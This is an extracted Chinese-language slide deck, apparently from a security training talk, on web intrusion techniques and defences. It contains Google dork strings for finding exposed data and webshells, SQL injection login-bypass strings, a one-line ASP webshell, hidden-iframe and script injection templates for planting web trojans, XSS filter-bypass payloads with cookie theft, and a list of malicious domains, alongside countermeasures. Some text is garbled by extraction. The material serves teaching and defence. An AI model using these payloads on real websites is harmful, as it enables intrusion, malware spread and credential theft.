<4D F736F F F696E74202D20BAF4B8F4A7F0A8BEBED4A4A A44AAB49A4E2AA6BA4C0AA525FC1BFB8712E >

Size: px

Start display at page:

Download "<4D F736F F F696E74202D20BAF4B8F4A7F0A8BEBED4A4A A44AAB49A4E2AA6BA4C0AA525FC1BFB8712E >"

青苦
5 years ago
Views:

1 網路攻防戰之 Web 入侵手法分析 MCP ( 微軟認證專家 ) MCSA ( 系統管理師 ) MCDBA ( 資料庫管理師 ) MCSE ( 系統工程師 ) BS7799 LA 國際資訊安全證書 TCSE( 趨勢防毒認證資訊安全專家 ) FOUNDSTONE Security Professional( 駭客終結者認證 ) 中華專案管理學會證書微軟資訊安全講師微軟 E 化管理大師微軟企業化管理大師台灣網路危機處理中心 (TWCERT) 受訓證書網路封包互動判讀認證 Class C 1

2 注意事項部份簡報為節省版面, 請點選各張簡報標註之超連結自行參閱本場次的 Demo 示範因場地之限 Demo 時無法再將字形及畫面放大, 想要抄筆記的同學請盡量往前坐本場次示範之手法為避免煽惑他人犯罪, 部分破壞性資訊例如 : 關鍵參數語法已做相關隱藏處理本場次示範所使用之惡意軟體受限於相關法律規定請勿索取議程 2

3 利用知名搜尋引擎尋找目標 Web Server 搜尋引擎的風險網站攻擊者思考基本進階其它語法與關鍵字搜尋存在漏洞的網站查找別人留下來的 Webshell 後門自動化 Google Hacks 工具如何防止 Google Hacks 搜尋引擎的風險 By 使用者搜尋關鍵字的結果可能讓使用者連入與真網站網址或網頁內容相似的偽冒 ( 假 ) 網站例如 : vs 例如 : vs 已被駭客植入惡意連結 ( 木馬 ) 的官方 ( 真 ) 網站例如 : 知名部落格所公告的網站 3

4 搜尋引擎的風險 By 網站管理者在架設網站過程中, 設計者將該網站會使用到的網頁圖片影音檔案文件檔案型式的資料檔案型式的資料庫 (access) 貪圖超連結或檔案上下傳的方便性, 採用一個實體資料夾就是一個網站的設計在這樣的網站設計與架設的概念下, 如果該網站之網頁存取權限或實體的資料夾檔案權限控管不當, 攻擊者只要猜測或使用工具取得該網站內資料夾或檔案文件名稱, 便可從 Internet 下載存放於該網站 ( 資料夾 ) 內本屬不應公開的文件或資料庫網站攻擊者思考之一 : 網頁名稱與路徑猜測首頁名稱 :index default 等猜測管理名稱 :admin login manage edit adminuser main adminmain 等虛擬目錄 / 資料夾名稱 :photo image admin user script db user 等預設路徑 : IIS:c:\inetpub\wwwroot Apache: /usr/local/apache 防禦對策 : 變更採用不易識別的名稱或路徑 4

5 網站攻擊者思考之二 : 工具與掃描使用工具 : 砍站軟體 Web 弱點掃描軟體駭客工具之後台掃描軟體駭客工具之注入軟體使用時機 : 網頁名稱與路徑猜測命中率太低時使用風險 : 大量且及時的掃描易被防禦設備阻擋或封鎖 IP 規避風險 : 使用 proxy 不停更換 IP 少量掃描分段掃描分時掃描用跳版 ( 肉雞 ) 掃描使用 DDoS 讓防禦設備 ByPass 針對漏洞攻擊而不使用掃描( 例如 :SQL Injection XSS CGI 漏洞 ) 防禦對策 : 調整防禦設備對 Web 攻擊的敏感度增加檢視閘道端或伺服器端 LOG 的頻率網站攻擊者思考之三 :Google Hacks 水可以載舟, 亦可以覆舟, 搜尋引擎雖然為企業網站增加曝光度, 但強大的搜尋技術卻也讓企業不想曝光的網站弱點與機密資訊一一現形, 造成駭客攻擊的索引指南或內部資料外洩而駭客或一般人使用搜尋引擎尋找資料 ( 難度很低又不需懂太多技巧 ), 會在有意或無意間取得網站的不想公開的資料超連結, 進而下載轉存針對非以網站為主要商務往來之中小型企業, 其成功率高且被發現攻擊的風險低, 是駭客攻擊前收集目標資料的好方法 5

6 手法缺點 : 對目標明確的單一目標網站目標網站 ( 例 : 政府金融網站 ) 成功率不見得高, 僅適合攻擊前灑網捕魚, 來尋找具有 Web 漏洞的網站作為參考對剛架設的新生兒網站或舊網站卻剛新增的網頁資料會找不到相關搜尋的索引資料 6

7 基本語法與關鍵字 site: ( 搜尋特定網址 ) inurl: ( 搜尋特定連結 ) intext: ( 搜尋網頁內文字 ) intitle: ( 搜尋網頁標題 ) filetype: ( 搜尋特定檔案格式 ) link: ( 搜尋互相連結的網頁 ) index of ( 搜尋開放目錄瀏覽 ) cache: ( 顯示網頁在 google 中的暫存資料 ) 進階語法與關鍵字 "access denied for user" "using password" "Index of /backup" allinurl: admin mdb inurl:passlist.txt " -FrontPage-" ext:pwd inurl:(service authors administrators users) "ASP.NET_SessionId" "data source=" "AutoCreate=TRUE password=*" "Index of /" +password.txt "Index of /password" "mysql dump" filetype:sql "pcanywhere EXPRESS Java Client" "VNC Desktop" inurl:5800 "phpmyadmin MySQL-Dump" "INSERT INTO" -"the "phpmyadmin MySQL-Dump" filetype:txt t t "phpmyadmin" "running on" inurl:"main.php "robots.txt" "Disallow:" filetype:txt intitle:"remote Desktop Web Connection" inurl:tsweb intitle:"welcome to Windows 2000 Internet Services" inurl:"printer/main.html" intext:"settings intitle:index.of administrators.pwd 7

8 其它語法與關鍵字 Johnny ihackstuff Google Hacking Database (GHDB) 找尋 Vulnerable Servers 語法 =summary&cat=9 找尋 Web Server Detection 語法 =summary&cat=7 搜尋存在漏洞的網站之一搜尋 URL 網址中含有 asp?id= 或 php?id= 語法為 inurl:asp?id= 或 inurl:php?id= 原因為類似這樣的 URL 傳值是最容易有 SQL Injection 的網頁但並不是凡是這樣撰寫網頁應用程式均有 SQL Injection 的漏洞, 只是以攻擊者的角度來想, 搭配搜尋引擎的尋找常見的 SQL Injection URL 語法可以降低在茫茫大海撈針中一個一個猜測網站的時間, 再搭配一些 Google Hacks 的組合搜尋字串, 很快就可找到入侵的目標網站 8

9 搜尋存在漏洞的網站之二 y y 手工測試目標網站是否具有SQL Injection 於於 asp?id= 之後加入下列情中一種語法 p 之後加入下列情中種語法 asp?id=and 1=1 或 asp?id= and 1=1- asp?id=and 1=2 或 asp?id= and 1=2- - y y 來判斷輸入於asp或php在=之後的值該資料庫接不接受如果能夠順利過關使得該asp或php程式沒有出現錯誤訊息就表示該程式具有SQL Injection的漏洞註此判斷法並非百分百能夠判斷出網站是否真的有 SQL Injection 原因是如果程式在前端Script或後端 DB的預存程序中有做字串或傳值變數的檢查就會失敗 9

10 查找別人留下來的 Webshell 後門之一 WebShell: 簡單就是一個 asp 或 php 木馬的後門程式該程式就是撰寫 asp 或 php 語法並已經添加好各種可以控制的指令撰寫出來的一個 Web 介面的檔案總管 ( 具有 FSO 功能 ) 利用各種漏洞將此文件上傳放置於 Web Server 的根目錄中, 與正常的 asp 或 php 程式檔案混在一起然後攻擊者就可以用 Web 的方式透過該 asp 或 php 木馬來控制 Web Server, 包含上下載文件新增帳號添加其它木馬或添加 <iframe> 於網頁中特稱為掛馬查找別人留下來的 Webshell 後門之二 FileSystemObject(FSO): 檔案系統物件 (FSO) 模型提供用來處理資料夾及檔案的物件架構工具此模型可讓您使用熟悉的 object.method 語法及大量的屬性 (Property) 方法及事件來處理資料夾及檔案您也可採用傳統 Visual Basic 陳述式及指令 FSO 模型使您的應用程式能夠建立變更移動及刪除資料夾, 或決定是否有特定資料夾存在及存在於何處而且還能讓您取得關於資料夾的資訊, 諸如資料夾名稱及建立或最後修改的日期 10

參考資料 : 使用 FileSystemObject 存取檔案 http://msdn.microsoft.

url=/library/cht/ microsoft com/library/cht/default asp?

asp 使用 ASP 與 Scripting.FileSystemObject 來建立動態目錄頁 http://support.

11 參考資料 : 使用 FileSystemObject 存取檔案 microsoft com/library/cht/default asp?url /library/cht/ vbcn7/html/vbconintroductiontofilesystemobjectmodel.asp 使用 ASP 與 Scripting.FileSystemObject 來建立動態目錄頁如何使用 ASP 建立檔案檢視器如何使用 ASP 建立目錄檢視器 11

12 查找別人留下來的 Webshell 後門之三使用 WebShell 的優點 : 因透過 80 port 所以可以穿越防火牆因為是在 Web Server 上透過 asp 或 php 程式來執行指令或語法, 所以閘道端的防禦設備不會攔截不會在閘道端系統留下 LOG, 只有 Web Server 與 DB 上的 LOG 會出現該 asp 或 php 程式有執行的記錄, 但權責分工之下 ( 網頁程式設計者資料庫管理師 Web Server 管理員資安人員 ) 沒有經驗的管理者或團隊很難判讀 LOG Web 植入木馬 ( 掛馬 ) 通常都是只有把植入的語法拿掉而已, 如果沒有刪除真正在運作的 WebShell, 那再次掛馬指日可待查找別人留下來的 Webshell 後門之四使用 WebShell 的缺點 : 最關鍵的步驟為 : 如何把 WebShell 上傳至目標 Web Server 的目錄之下常利用的手法 : 1. 利用 Web Server 本身的漏洞 ( 最好用手法 ) 2. 利用 SQL Injection 的漏洞搭配其他上傳指令或 tftp 工具 ( 最常見手法 ) 3. 利用 XSS 語法使網頁設計師的電腦中木馬, 使其在更新網頁檔案時一並更新進去 Web Server 12

13 查找別人留下來的 Webshell 後門之五攻擊者入侵某一個網站順利得到 WebShell 之後, 並不會把它殺掉也不會把該 WebShell 的某些關鍵字加入排除搜尋引擎建立 Index 的索引檔 ( 因為這是 Web 管理者要做的事 ) 所以只要不是才剛剛入侵成功的 WebShell( 因為搜尋引擎沒有資料 ), 通常透過 WebShell 的某些關鍵字就可找到前人留下的智慧與寶藏註 : 如果是剛剛才入侵成功的網站, 可用網頁名稱與檔案建立日期來猜測, 搭配砍站工具或 Web 掃描工具就可發現多出來的蛛絲馬跡查找別人留下來的 Webshell 後門之六常見 WebShell 檔名 :( 註 : 攻擊者可改檔名 ) diy.asp ( 網站小助手 ) wei.asp 2006.asp newasp.asp myup.asp Log.asp phpspy.php 13

14 自動化 Google Hacks 工具 ( 免費軟體 ) Wikto SiteDigger 需要 Google Web APIs license key( 已停止申請 ) 每個使用授權每日僅能呼叫 1000 次, 而且每次的查詢結果僅回傳前 1000 筆, 回傳則以最多 10 筆為一個單位, 而搜尋內容則不包括圖片新聞等其他內容, 僅限於網頁資料, 如此設計均是為及提昇執行效能所做的考量自動化 Google Hacks 工具 ( 駭客軟體 ) Alt-Google Google 蜘蛛 : 語法掃描 : 語法掃描 Google Hack V2.0 : 協助 Web 搜尋用挖掘雞 or 挖掘機 : 掃描語法並獲得目標網站網址, 並依預先設定好的條件找到可入侵的網站 14

15 如何防止 Google Hacks 之一在網路伺服器上, 增加一個 robots.txt 然後在這個檔案中加入 User-agent: allow: Disallow: 這參數進行設定, 一般來說都可以阻止有道德的搜尋引擎程式讀取並儲存您的網頁 User-agent:Googlebot Disallow:/*.mdb$ User-Agent:yahoobot Disallow:/*.mp3$ User-agent:* Disallow:/*.* 如何防止 Google Hacks 之二可以在網頁的 HEAD 區段中, 加入一些特殊的 HTML META TAG 標籤, 來指出某一個網頁是否可以被索引分析或鏈接例如你可以加入 <META NAME= ROBOTS CONTENT= NOINDEX > 表示 : 不希望搜尋引擎處理儲存這個網頁 <META NAME= ROBOTS CONTENT= NOARCHIVE > 表示 : 希望搜尋引擎處理這個網頁, 但是不儲存網頁, 也就是說, 不會有庫存頁 <META NAME= ROBOTS CONTENT= NOFOLLOW > NOFOLLOW 表示 : 希望搜尋引擎處理這個網頁, 但是不繼續處理這個網頁中另外連結的網頁 <META NAME= ROBOTS CONTENT= NOINDEX,NOFOLLOW > 表示 : 不希望搜尋引擎處理儲存這個網頁, 以及這個網頁中另外連結的所有資訊 15

16 如何防止 Google Hacks 之三將敏滿性的網頁資料檔案或目錄移動到網路伺服器可以存取的檔案或目錄範圍或乾脆刪除該檔案而不要放至於 Web Server 中在網路伺服器上, 將該網頁檔案或目錄的設定讀取權限設為保護或需密碼才能讀取採用 https: 安全加密或鑲嵌憑證的方法存取機密性網頁做好網頁程式 (asp php jsp 等 ) 的安全驗證, 即使被找到機密網頁也能確保在權限等安全控管技術之下, 不被進入網頁中存取資料 Google Hacks 相關參考網址搜尋引擎過濾單位機密資料方法從 Google 的索引中移除我的內容實戰設計 robots.txt 與標籤知名搜尋引擎 Web 入侵手法 hacker.blogspot.com/2007/01/web.html com/2007/01/web html Google Hacks 入侵你家的網路監視器! 16

17 Web Server 入侵手法 Microsoft 漏洞利用網頁木馬論壇套件漏洞利用 SQL Injection 利用 XSS 利用 Microsoft 漏洞利用 MS07-004: 向量標記語言中的弱點可能會允許遠端執行程式碼 (929969) tin/ms mspx MS07-017: GDI 中的弱點可能會允許遠端執行程式碼 (925902) tin/ms mspx MS07-020: Microsoft Agent 中的弱點可能會允許遠端執行程式碼 (932168) tin/ms mspx MS07-029: Windows DNS RPC 介面的弱點可能會允許遠端執行程式碼 (935966) tin/ms mspx 17

18 18

19 網頁木馬網頁木馬就是將木馬和網頁結合在一起, 打開網頁的同時也會執行木馬最初的網頁木馬原理是利用 IE 瀏覽器的 ActiveX 控制項, 執行網頁木馬後會彈出一個控制項下載提示, 只有點擊確認後才會運行其中的木馬這種網頁木馬在當時網路安全意識普遍不高的情況下還是有一點使用價值的, 但是其缺點是顯而易見的, 就是會出現 ActiveX 控制項下載提示當然現在很少會有人去點選那莫名其妙的 ActiveX 控制項下載確認視窗在這種情況下, 新的網頁木馬誕生了這類網頁木馬通常利用了 IE 瀏覽器或系統的漏洞, 在運作執行的時候沒有絲毫提示, 因此隱藏性極高 19

20 網頁木馬的類別原生型木馬 : 此種木馬本身就是一個完整的遠端控制型的木馬程序, 不需要依賴漏洞例如 : 灰鴿子漏洞型網頁木馬 : 必須依賴系統瀏覽器應用程式的漏洞才能產生感染及植入的惡意行為例如 : MS07017 asp 或 php 網頁木馬 : 該程式就是撰寫 asp 或 php 語法並已經添加好各種可以控制的指令撰寫出來的一個 Web 介面的檔案總管可分為含 FSO 與不含 FSO 的網頁木馬一句話網頁木馬 : 只利用一行語法來傳值的木馬例如 :<%eval request( value )> 網頁木馬流程駭客知名的官方網站 [ 上傳 ] 具 FSO 功能的網頁木馬不知情的一般使用者首頁 [ 掛馬 ] 將首頁或其他網頁植入 <ifrme> 隱藏框架引導到跳版網站跳版網站原生型木馬漏洞型網馬 20

21 網站網頁掛馬掛馬 : 掛馬這個行為就是駭客採用系統漏洞網頁漏洞 SQL Injection XSS 等技巧入侵了一些網站後, 將自己編寫的網頁木馬語法嵌入被駭網站的主頁中, 利用被駭網站的流量將自己的網頁木馬傳播開去, 以達到自己植入真正木馬的目的註 : 也可能先入侵後再上傳具有 FSO 功能的網頁木馬稱為 WebShell, 再利用該木馬將其它正常網頁掛馬好處是只要原來的 WebShell 不被殺掉, 就可一直重複掛馬網站網頁掛馬語法框架掛馬 : <iframe src= 木馬網址 width=0 height=0></iframe> JScript 文件掛馬 : 首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處 document.write("<iframe width='0' height='0' src=' 木馬網址 '></iframe>"); 最後 JScript 掛馬的語法為 : <script language=javascript src=xxx.js></script> JScript 變型加密 : <SCRIPT language= JScript.Encode src= muma.txt 可改成任何附檔名 body 掛馬 : <body onload="window.location=' 木馬網址 ';"></body> 隱藏掛馬 : top.document.body.innerhtml = top.document.body.innerhtml + '\r\n<iframe src=" 21

22 CSS 中掛馬 : 先將製作好的 muma.js 先利用各種方式上傳至目標處 body { background-image: url('javascript:document.write("<script src= JAVA 掛馬 : <SCRIPT language=javascript> window.open (" 木馬網址 ","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 圖片偽裝 : <html> <iframe src=" 網馬網址 " height=0 width=0></iframe> <img src=" 圖片網址 "> </html> 偽裝呼叫 : <frameset rows="444,0" cols="*"> <frame src=" 開啟的網頁 " framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src=" 網馬網址 " frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 欺騙超連結網址手法 : <a href=" 迷惑他人超連結網址, 故意顯示這個網址卻連向木馬網址 )" onmouseover="www_163_com(); return true;"> 網頁要顯示的內容 </a> <SCRIPT Language="JavaScript"> function www_xyz_com () { var url=" 真正連的網頁木馬網址 "; open(url,"newwindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,r esizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); } </SCRIPT> 論壇套件漏洞利用由於 asp 或 php 簡單易學, 所以網路常常可找尋到相關免費的程式架設論壇網站但由於安裝程式的管理者常忽略需要修改原始設定及安全性選項, 使得依照預設值 ( 瘋狂按下一步就會裝好 ) 的資料便可取得該論壇權限, 進而利用社交工程取得個人資料常利用手法 : Cookie 欺騙爆庫法 : 論壇 DB 爆庫爆庫法 :%5c 路徑爆庫 SQL Injecion XSS 惡意超連結至網頁木馬 DDoS 22

23 Cookie 欺騙 Cookie 記錄著使用者的帳戶 ID 密碼之類的訊息, 如果在網上傳遞, 通常使用的是 MD5 方法加密這樣經由加密處理後的訊息, 即使被網路上一些別有用心的人截獲, 也看不懂, 因為他看到的只是一些無意義的字母和數字然而, 現在遇到的問題是, 截獲 Cookie 的人不需要知道這些字串的含義, 他們只要把別人的 Cookie 向伺服器提交, 並且能夠通過驗證, 他們就可以冒充受害人的身份, 登陸網站這種方法叫做 Cookie 欺騙手法 : 截獲他人 Cookie 內的帳號與密碼獲取權限, 搭配其它手法進行掛馬等更進一步攻擊 23

24 爆庫法取得資料庫名詞解釋 : 原為大陸用語是指利用強行的手段, 例如 : 在網址列添加特殊字串或路徑, 使目標網站的資料庫實體路徑暴露出來, 進而成功下載該資料庫, 取得帳號密碼等權限之過程常見手法 : 利用論壇套件其資料庫均固定放至於某虛擬目錄中之特性, 輸入關鍵字後下載 ( 註 : 以 access 型態之資料庫居多 ) 把網址列中的 / 換成 %5c 然後送出該網址, 就可以在 Web Server 的錯誤訊息中得到資料庫的實體路徑註 : 目前只要更新使用新版的論壇套件, 幾乎都已經修正相關弱點論壇 DB 爆庫 : 原理 Access 資料庫的儲存隱患 : 在 ASP+Access 應用系統中, 如果能獲得或猜到 Access 資料庫的儲存路徑和資料庫名稱, 則該資料庫就可以被下載到本地例如 : 對於線上書店的 Access 資料庫, 人們一般命名為 book.mdb store.mdb 等, 而存儲的路徑一般為 URL/database 或乾脆放在根目錄 URL/ 之下這樣, 只要在瀏覽器地址欄中輸入網址 : URL/database/store.mdb, 就可以輕易地把 store.mdb 下載到本地的機器中 Access 資料庫的解密隱患 : 由於 Access 資料庫的加密機制非常簡單, 所以即使資料庫設置了密碼, 解密也很容易由此可見, 無論是否設置了資料庫密碼, 只要資料庫被下載, 其資訊就沒有任何安全性可言了 24

25 論壇 DB 爆庫 : 解決方案非常規命名法 : 不要簡單地命名為 book.mdb 或 store.mdb, 而是要起個非常規的名字, 例如 :faq19jhsvzbal.mdb, f b l 再把它放在如./akkjj16t/kjhgb661/acd/avccx55 之類的深層目錄下使用 ODBC 資料來源 : 使用 ODBC 資料來源, 不要把資料庫名稱直接寫在 ASP 程式碼中, 例如 : DBPath = Server.MapPath(./akkjj16t/kjhgb661/acd/avccx55/faq19jhsvzbal.mdb ) conn.open driver={microsoft Access Driver (*.mdb)}; dbq= & DBPath 改成 : conn.open ODBC-DSN 名稱就不會發生這樣的問題了在 IIS 的設定 : 將放置 Access 資料庫的資料夾 ( 或虛擬目錄 ) 給予寫入但不要給予讀取的權限即可, 如此一來, 就算知道儲存路徑和資料庫名稱, 一樣無法從 Web 下載在主目錄應用程式設定應用程式對應新增執行檔 : C:\WINNT\System32\inetsrv\ism.dll 副檔名 :.mdb 限制於 :GET,POST ( 缺點 : 以後要編修 Access 資料庫, 很容易忘記有鎖權限或鎖副檔名 ) 25

26 %5c 路徑爆庫 : 原理它不是網頁本身的漏洞, 而是利用了 IIS 解碼方式中的一個特性, 如果 IIS 安全設定不周全, 而網頁設計者及管理者未考慮 IIS 錯誤時, 就會被人利用為何要用 "%5c"? 實際上它是 "\" 的十六進位代碼, 也就是 "\" 的另一種表示法基本上 IE 會自動在網址列就把 "\" 轉變成 "/" 的符號, 使得瀏覽到同一個網址但是, 當我們把 "/" 換成十六進位寫法 "%5c" 時,IE 卻不會對此符號進行轉換, 問題正是出在這裡 26

27 一個典型的 conn.asp 連線語法中如下 :DBPath = Server.MapPath("db/dsvote.mdb") 當瀏覽呼叫 conn.asp 時, 就會在 IIS 解析成 /vote\votelist.asp 在 IIS 中, / 和 \ 代表著不同的意義, 遇到了 \ 時, 認為它已經到了根目錄所在的實體路徑便不再往上層解析, 於是 ASP 就會出錯將網站的完整的實體路徑加在錯誤訊息裡 : 'C:\Inetpub\wwwroot\STORE\mood#.asa 註 : 將 mood#.asa 改名為 mood.mdb %5c 路徑爆庫 : 解決方案修改程式 : 在 conn.asp 檔中呼叫資料庫語法之後要加上 On Error Resume Next 的語法, 它的意思是出錯後, 繼續執行下面語法, 也就是不理會出錯, 當然就不會給出資料庫的錯誤資訊了修改 Web Server 回報錯誤的畫面 : 在 IIS 內的虛擬目錄 -> 內容 -> 自訂錯誤 -> 選擇錯誤編號 - > 編輯內容換到預設的網頁即可 27

28 其它套件路徑暴露本地原產 : ANN 公告系統 : For Unix/Linux, Apache + php + mysql ( 典型的 LAMP) 是一個用 PHP 撰寫的公告程式, 主要用來發佈公告, 作者是 Charles Nextime 因作者本身也是教育從業人員, 所以廣受各教育單位使用該 ANN 公告套件目前最終版 : V1.29 ( 已不再更新 ) 其它套件路徑暴露 : 原因於該 index.php 程式碼中的判斷式 if (isset($nuke_dir) && $usenuke == 1) { include("$nuke_dir/mainfile.php"); include("$nuke_dir/header.php"); } 指定了 include 的檔案, 這時只要不按照它的邏輯, 即可使該 php 程式發生錯誤, 顯示檔案路徑 28

29 其它套件路徑暴露 : 解決方案修正該公告套件為最終版修正該公告套件的程式語法在 php.ini i 文件中將下列參數關閉 global_registers = off allow_url_fopen = 0 修改 Apache 遇到 php 程式錯誤時出現的錯誤畫面例如 : 有任何錯誤都導向一個固定的畫面註 : 該公告套件於 Index.php 有暴露路徑漏洞 log.inc.php 有 RemoteFileInclude(RFI) 遠端文件引入漏洞, 可利用它植入 WebShell 29

30 SQL Injection 利用引起的原因為網頁程式設計師在撰寫 asp 或 php 程式的時候, 對呼叫 (ADO 連線 ) 後端資料庫的帳號權限太大, 在加上對特殊字串以及語法沒有過濾或者過濾不完全而導致的其最主要的攻擊目標為資料庫, 以取得下列資訊為主 : 獲取資料庫帳號及密碼獲取作業系統帳號及密碼利用 XP_CmdShell 執行 DOS 指令猜測網頁實體路徑來進行換首頁或上傳 / 下載文件上傳網頁木馬並植入後門 SQL 條件式語法漏洞主要出現在登入帳號的 asp 或 php 程式上, 利用這個漏洞就可以不需要帳號密碼進入管理畫面主要為網頁程式設計的瑕疵 : 沒有對單引號或雙引號 '' 進行過濾 SQL 條件式 and or 的邏輯沒有考慮 SQL 語法的 where 子句所傳入的變數沒有檢查 SQL 語法中 -- 是表示該符號之後的語法或參數變成註解語法 : or = or a'or'1=1- - 'or1=1- - ''or1=1- - or1=1- - 'ora ='a or = a = a ')or( a ='a 30

31 網頁應用程式語法 : 有問題版 sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "' 傳入惡意語法後 sql_cmd = "select * from mydatabase where id='" 'or 1=1 -- "' and passwd='" & Request("passwd") & "' 則變成前面的 where 條件為 1=1 而後面的 password 則因 -- 變成註解, 所以就不用密碼可進入網頁應用程式語法 : 修正版以程式設計的觀點來看, 將表單或查詢字串直接帶入 SQL 語法, 是一切弊病的源頭, 要徹底排除 SQL 資料隱碼攻擊, 必須從根源對症下藥也就是必須在取得表單資料後, 針對單引號進行過濾, 然後再組合為 SQL 語法, 例如 : sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "'" 應該改為 myid = Replace(Request("id") ),"'","'+chr(34)+'") ) mypwd = Replace(Request("passwd"),"'","'+chr(34)+'") sql_cmd = "select * from mydatabase where id='" & myid & "' and passwd='" & mypwd & "'" 31

32 SQL Injection 相關參考網址 SQL Injection ( 資料隱碼 ) 駭客的 SQL 填空遊戲 G1.htm G2.htm 資料隱碼 SQL Injection 的因應與防範之道 tm ASCII 碼對照表 SQL Injection 檢測工具 ( 無殺傷力 ) XSS 利用 Cross Site Scripting(XSS) 跨網站功擊 : XSS 產生的原因是由於網頁程式設計師在撰寫程式時, 對於一些變數沒有充份過濾, 直接把使用者所送出的資料送往 Web Sever 執行這樣的程式流程造成攻擊者可以送出一些特別製造的 Script 語法, 只要成功送往後端執行成功, 便可達成如 : 竊取 cookie 植入網頁木馬等原本不存在的功能 32

33 XSS 的探測和繞過過濾基本檢測語法 : <script>alert( xss )</script> 如果 <script> 被過濾, 則改用 <img src=javascript:alert( xss )> 如果 javascript: 被過濾, 則用 16 進位的值取代一些關鍵字 <img src= javascrip&#116&#58alert(/xss/) > 也可用空白字元 Tab 添加 <img src= javas cript:alert(/xss/) width=0> 或者用語法的事件與屬性來避免關鍵字被攔截 <img src= # onerror=alert(/xss/)> <img src= # style= xss:expression(alert( xss )); > 例如 :Yahoo Mail 的 XSS 語法 ( 已修正 ) <STYLE onload= alert( cookies exploit! );alert(document.cookie) > XSS 相關參考網址 Cross Site Scripting questions and answers Apache Cross Site Scripting Info How to prevent cross-site scripting security issues Information on Cross-Site Scripting Security Vulnerability rssite.mspx?mfr=true Microsoft Anti-Cross Site Scripting Library V1.0 =9A2B9C92-7AD9-496C-9A89- AF08DE2E5982&displaylang=en 33

34 Web Server 防禦策略網頁木馬流程阻擋點之一網頁木馬流程阻擋點之二網頁木馬流程阻擋點之三網頁木馬流程阻擋點之四惡意連結網站清單駭客入侵流程分析 34

35 網頁木馬流程阻擋點之一駭客知名的官方網站 [ 上傳 ] 具 FSO 功能的網頁木馬首頁不知情的一般使用者跳版網站阻擋策略 : 設備網頁應用程式防火牆封鎖異常來源 IP 入侵偵測系統 IDS/IDP 觀察異常封包服務搜尋引擎的阻擋弱點掃描滲透測試防毒牆 ( 由外到內 ) 阻擋傳入的木馬 35

36 36

37 網頁木馬流程阻擋點之二駭客知名的官方網站 [ 上傳 ] 具 FSO 功能的網頁木馬不知情的一般使用者首頁 [ 掛馬 ] 將首頁或其他網頁植入 <ifrme> 隱藏框架引導到跳版網站跳版網站阻擋策略 : 設備 SUS / WSUS 修補系統漏洞 Web DB 的權限控管企業型防毒軟體及防間諜軟體 LOG 及事件分析軟體服務搜尋引擎的阻擋弱點掃描滲透測試程式碼檢測檢視與設定資料夾權限移除不需要及罕用的服務變更系統與 Web 相關預設值 Web 與 DB 的備份軟體 37

38 網頁木馬流程阻擋點之三駭客知名的官方網站首頁不知情的一般使用者跳版網站原生型木馬漏洞型網馬阻擋策略 : 設備網頁應用程式防火牆封鎖異常來源 IP 入侵偵測系統 IDS/IDP 觀察異常封包服務收集易被植入或經常感染的網址成為黑名單防毒牆 ( 由內到外 ) 阻擋傳輸的木馬 Proxy Server 的黑白名單網址過濾或攔截的設備與軟體 38

39 網頁木馬流程阻擋點之四駭客知名的官方網站不知情的一般使用者跳版網站阻擋策略 : 設備 Windows Update / Microsoft Update 修補系統漏洞單機型防毒軟體及防間諜軟體個人單機型防火牆服務善用線上掃毒比對不同防毒本機 HOSTS 惡意網址清單改用其它瀏覽器可以改善 ( 但不能完全避免 ) 網頁瀏覽安全防護軟體個人資料的備份軟體 39

$惡意連結網站清單為了避免瀏覽網頁時中毒, 你可以將惡意連結網站清單中的網址做以下之處理第一個方法 : 加入本機 HOST 檔案適合 : 一般家用使用者於本機電腦中加入缺點 : 在一般公司中有超過 10 台以上電腦,MIS 大概就會累到不會想處理在 [ C:\WINDOWS\system32\drivers\etc ] 加入此 hosts 檔案惡意連結網站清單如果不會設定$

40 惡意連結網站清單為了避免瀏覽網頁時中毒, 你可以將惡意連結網站清單中的網址做以下之處理第一個方法 : 加入本機 HOST 檔案適合 : 一般家用使用者於本機電腦中加入缺點 : 在一般公司中有超過 10 台以上電腦,MIS 大概就會累到不會想處理在 [ C:\WINDOWS\system32\drivers\etc ] 加入此 hosts 檔案惡意連結網站清單如果不會設定 hosts 這個檔案, 知名部落格已經將所有的清單放進 hosts 檔案, 可以直接下載 hosts 檔案並蓋掉原來的更新日期 15:42 將它解壓縮到 %SystemRoot%\system32\drivers\etc 資料夾下 ( 在 Windows XP,%SystemRoot% 代表 c:\windows,c:\ 是系統磁碟機代號 ) 網站黑名單 ( 大砲開講 BLOG 提供 ) /04/24 更新 Hosts 檔案 (Malware-Test Lab 提供 ) /04/24 更新 40

41 第二個方法 : 將惡意網站網址加入到瀏覽器的限制的網站中適合 : 一般家用使用者於本機電腦中加入缺點 : 在一般公司中有超過 10 台以上電腦,MIS 大概就會累到不會想處理或者說 IE 已經玩爛了, 根本不會想管第三個方法 : 在有網域情況下利用 [ 群組原則 ] 將惡意網站網址加入到瀏覽器的限制的網站中, 當使用者登入網域時自動套用適合 : 一般企業使用者於加入網域的電腦中使用, 使用者只要登入網域就會自動有此功能缺點 : 在沒有網域的企業中, 例如 : 工作群組的環境中無法使用會有例外的電腦例如 :NB 使用者打死不加入網域那也會破功 41

42 第四個方法 : 採購具有攔截惡意網址的閘道端設備, 例如 : 防毒牆 UTM 網址過濾器 Proxy Server 等適合 : 一般企業使用者於沒有網域的電腦中使用, 使用者只要經閘道端上網就會自動判斷並攔截有惡意的網址缺點 : 如果沒有編列預算時, 一般來說這樣的設備並不便宜也許可以改用開放源碼解決方案中的其他功能取代, 但需要 MIS 經常維護也會有例外的電腦, 例如 :NB 使用者可能在公司之外的任何地方上網, 並不能保證其他地方也有相關的閘道端防禦設備可以阻擋, 成為防禦死角 2008/09~10 月新增惡意掛馬網址鏈結 www3.ss11qn.cn 1.cool0.biz fuckuu.fs xx.com dnd.3322.org real.kav2008.com gf.ccves.cn good00.net adasas.cn net yeapple.com xyxy68.8u8.net winzheng.126.com girlchinese.com net youlove.3322.net tty.yyun.net i5t.cn page.taobao.com search.taobao.com taobao.com Isw.com ave2.cn 資料來源天罣 : 42

